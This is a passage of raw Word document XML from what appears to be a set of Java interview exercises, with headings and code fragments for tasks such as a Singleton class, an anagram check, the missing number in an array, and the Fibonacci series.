          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="328" w:name="_Toc197867542"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0093488A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Singleton class</w:t>
      </w:r>
      <w:bookmarkEnd w:id="328"/>
    </w:p>
    <w:p w14:paraId="378025A5" w14:textId="260B9540" w:rsidR="00E56884" w:rsidRPr="00CE4B95" w:rsidRDefault="00986F7F" w:rsidP="00E56884">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5D3B80" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to implement Singleton class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30EA08" w14:textId="784C759D" w:rsidR="00E56884" w:rsidRPr="00CE4B95"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BC72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33B7FF"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Create a private static instance of the class (initially null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A269E8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069BB83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711C4"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Private constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771426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0C433B"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instance created."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347BE68E"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8B14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C6970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Public static method to provide access to the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D19B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0A5CC"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1569E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only if not created yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8CF19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1C7DC0"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E11176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C80E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AAACC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B366B2"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7A60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2298C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A0D7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E2A37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59FA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AEA0BC7"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obj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6FD2A9C8"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84B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41FF928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e insta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04A57FB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3110E" w14:textId="5F86A82B"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54990EC9" w14:textId="77777777" w:rsidR="00014FC0" w:rsidRPr="00CE4B95" w:rsidRDefault="00014FC0" w:rsidP="00014FC0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22757B62" w14:textId="01CC1402" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="_Toc197867543"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00EB6347" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find missing number from array</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
    </w:p>
    <w:p w14:paraId="6D28B7E5" w14:textId="77777777" w:rsidR="00BC6AC9" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7" w:rsidP="00BC6AC9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Problem Definition:</w:t>
      </w:r>
      <w:r w:rsidR="00BC6AC9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write a program - method to return missing number from array of length n=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B2CD4" w14:textId="468C49D1" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC6AC9" w:rsidP="00BC6AC9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example: n=3, [2,0,3] -&gt; Output -&gt; 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C38CC5" w14:textId="1A0DBE0A"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ssingNumber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B6AD61"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65DDE"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EC02C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532C90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856273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2B72D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1D110"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171E31AD"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646B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39D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ctualSum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B44907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651C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5B7258"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3E5EFA"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6CE81D3"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7B574FCB"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9D1E46"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ssi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299F434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ssing numb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ss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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4476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662B" w14:textId="0CF97E53"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1DDCC1" w14:textId="77777777" w:rsidR="00121F47" w:rsidRPr="00CE4B95" w:rsidRDefault="00121F47" w:rsidP="00121F47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F875735" w14:textId="61F8604A" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="330" w:name="_Toc197867544"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00653D81" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Anagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="330"/>
    </w:p>
    <w:p w14:paraId="2BCB001A" w14:textId="77777777" w:rsidR="006E2279" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF53B7" w:rsidP="006E2279">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="006E2279" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a program in java to check if two strings are Anagram or not. Return boolean method </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571E38F" w14:textId="40AAF929" w:rsidR="006E2279" w:rsidRPr="00CE4B95" w:rsidRDefault="006E2279" w:rsidP="006E2279">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>LISTEN - SILENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56294B91" w14:textId="5D33E2D4" w:rsidR="00AF53B7" w:rsidRPr="00CE4B95" w:rsidRDefault="006E2279" w:rsidP="006E2279">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Implement using collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0944E62D" w14:textId="20E38B1F"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785B16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EF37BA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DBC18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agr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D698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E5830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1A05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0D0941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CCE7E5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D1A1B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D36396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526A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BE855F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3B35DBD6"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p>
    <w:p w14:paraId="1C3F800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2Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B204E5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p>
    <w:p w14:paraId="316AFEE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0E74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76BF4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4F1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05F2DC1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0F1862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4DB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146C9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BD02C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752168C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1DBDB99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285B6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2EAF05F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84500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FE4B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B3657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4954A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840BE1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36C9602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79C1C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EFC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FB2C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DF022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86261E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24BD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1D34FD3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p>
    <w:p w14:paraId="14E29C4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1B78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227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p>
    <w:p w14:paraId="5249DF9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713771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CCF2B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88416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ISTEN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341EDF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LENT"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0353565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2F23AB6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40BC9697" w14:textId="7C025740"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6C7109" w14:textId="507E1FC9"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581351FF" w14:textId="77777777" w:rsidR="00AE118C" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE118C" w:rsidP="00AE118C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F595C40" w14:textId="12767B5A" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="331" w:name="_Toc197867545"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program </w:t>
      </w:r>
      <w:r w:rsidR="00DF32EE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- Swap two numbers without using a third variable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="331"/>
    </w:p>
    <w:p w14:paraId="07AC1785" w14:textId="77777777" w:rsidR="00DF32EE" w:rsidRPr="00CE4B95"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wapNumbe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5C17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B5A0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FD9A50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9D836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efore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24C7735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A0B7C9"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logic without third variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB75211"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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D42AEC"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 = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F63E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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D291373"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DBFDE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fter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1A7E8E0"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FEE23" w14:textId="31456B66"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8E65F49" w14:textId="77777777" w:rsidR="00DF32EE" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF32EE" w:rsidP="00DF32EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D598A51" w14:textId="1DDA392E" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="332" w:name="_Toc197867546"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00321FFD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00E85FB7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00321FFD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rint even and odd numbers without using the modulus operator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="332"/>
    </w:p>
    <w:p w14:paraId="416A4D98" w14:textId="194127D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WithoutModulu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C7182"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B676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03A0EAB"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51777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AC5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FF0C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ven"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84C91A"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23B6D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Odd"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B6D57"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E84C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804BC"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B8056" w14:textId="6F526661"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181F59" w14:textId="77777777" w:rsidR="00B219F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00B219F1" w:rsidP="00B219F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78551815" w14:textId="0475034B" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="333" w:name="_Toc197867547"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00D61AB3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find third largest number from array using java 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="333"/>
    </w:p>
    <w:p w14:paraId="071953DB" w14:textId="20DB886C"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650A4AD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p>
    <w:p w14:paraId="56E5DB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p>
    <w:p w14:paraId="4B12078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76C2F"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irdLargest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0C02"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F86C3"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p>
    <w:p w14:paraId="0B41BF1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4D479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hir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53C09BC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xed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F255AB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7716F40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469BA10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B7E76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1D845E2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51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43D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rd largest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7D3B0697"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8CD7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rray doesn't have a third largest element."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216FE6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FD42B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0B589B" w14:textId="6C7D6F8E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FD4B0" w14:textId="77777777" w:rsidR="003E52D4" w:rsidRPr="00CE4B95" w:rsidRDefault="003E52D4" w:rsidP="003E52D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B885DFE" w14:textId="016B34DD" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="334" w:name="_Toc197867548"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="002C08B0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Print even and odd numbers using java 8 stream API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="334"/>
    </w:p>
    <w:p w14:paraId="45AD97BF" w14:textId="556ED99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7D885B4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323A82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F70B3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UsingStream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6A44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8953C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p>
    <w:p w14:paraId="06607355"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353C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Numbers:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5FC6CF"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B5ABCC7"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09065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629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B3F0AA"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dd Numbers:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442494A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A68B8C4"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E852413"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C5C3D2"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FBC52" w14:textId="02003D25"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1AD17E" w14:textId="77777777" w:rsidR="00C01D88" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01D88" w:rsidP="00C01D88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BFEE31" w14:textId="02D3B797" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="_Toc197867549"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00614775" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Fibonacci series</w:t>
      </w:r>
      <w:bookmarkEnd w:id="335"/>
    </w:p>
    <w:p w14:paraId="500EAEF5" w14:textId="1B880169"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DADA"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8CB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terms to print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39288F0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0333B7"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E3D43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6451089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C25A3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B20DC"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FF85298"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54D5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xt term = sum of previous two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3C37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1A9E780F"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C70AA6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945C17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B5409"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1C6C2A" w14:textId="4D40EC75"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ABF927" w14:textId="77777777" w:rsidR="00183269" w:rsidRPr="00CE4B95" w:rsidRDefault="00183269" w:rsidP="00183269">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F35269" w14:textId="5A6D5C50" w:rsidR="00365A15" w:rsidRPr="00CE4B95" w:rsidRDefault="00365A15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="336" w:name="_Toc197867550"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
